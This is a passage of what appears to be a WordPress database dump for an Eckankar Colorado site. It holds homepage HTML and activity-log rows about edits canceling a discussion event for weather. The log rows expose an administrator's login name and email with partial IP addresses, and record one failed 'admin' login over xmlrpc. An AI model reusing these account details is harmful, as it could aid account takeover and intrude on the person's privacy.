30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238014,40477,'_message_key','post_updated'),(238015,40477,'_user_id','2'),(238016,40477,'_user_login','S8zhaBda'),(238017,40477,'_user_email','nada@zipnadanot.org'),(238018,40477,'_server_remote_addr','76.130.120.x'),(238019,40477,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(238020,40478,'term_id','204'),(238021,40478,'term_name','Canceled'),(238022,40478,'term_taxonomy','mec_label'),(238023,40478,'_message_key','created_term'),(238024,40478,'_user_id','2'),(238025,40478,'_user_login','S8zhaBda'),(238026,40478,'_user_email','nada@zipnadanot.org'),(238027,40478,'_server_remote_addr','76.130.120.x'),(238028,40478,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit-tags.php?taxonomy=mec_label&post_type=mec-events'),(238029,40479,'post_id','269147'),(238030,40479,'post_type','mec-events'),(238031,40479,'post_title','The Spiritual Law of Grace and Divine Love'),(238032,40479,'_message_key','post_updated'),(238033,40479,'_user_id','2'),(238034,40479,'_user_login','S8zhaBda'),(238035,40479,'_user_email','nada@zipnadanot.org'),(238036,40479,'_server_remote_addr','76.130.120.x'),(238037,40479,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269147&action=edit'),(238038,40480,'post_id','269147'),(238039,40480,'post_type','mec-events'),(238040,40480,'post_title','The Spiritual Law of Grace and Divine Love'),(238041,40480,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238042,40480,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #ce0000;\">Due To Weather - This Event Is Canceled</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238043,40480,'_message_key','post_updated'),(238044,40480,'_user_id','2'),(238045,40480,'_user_login','S8zhaBda'),(238046,40480,'_user_email','nada@zipnadanot.org'),(238047,40480,'_server_remote_addr','76.130.120.x'),(238048,40480,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269147&action=edit'),(238049,40481,'post_id','269147'),(238050,40481,'post_type','mec-events'),(238051,40481,'post_title','The Spiritual Law of Grace and Divine Love'),(238052,40481,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #ce0000;\">Due To Weather - This Event Is Canceled</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238053,40481,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #ce0000;\">Due To Weather - This Event Is Canceled</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238054,40481,'_message_key','post_updated'),(238055,40481,'_user_id','2'),(238056,40481,'_user_login','S8zhaBda'),(238057,40481,'_user_email','nada@zipnadanot.org'),(238058,40481,'_server_remote_addr','76.130.120.x'),(238059,40481,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269147&action=edit'),(238060,40482,'failed_username','admin'),(238061,40482,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(238062,40482,'_message_key','user_unknown_login_failed'),(238063,40482,'_xmlrpc_request','true'),(238064,40482,'_server_remote_addr','50.116.16.x'),(238065,40483,'post_id','269147'),(238066,40483,'post_type','mec-events'),(238067,40483,'post_title','The Spiritual Law of Grace and Divine Love'),(238068,40483,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #ce0000;\">Due To Weather - This Event Is Canceled</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(238069,40483,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #ce0000;\">--Due To Weather - This Event Is Canceled--</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 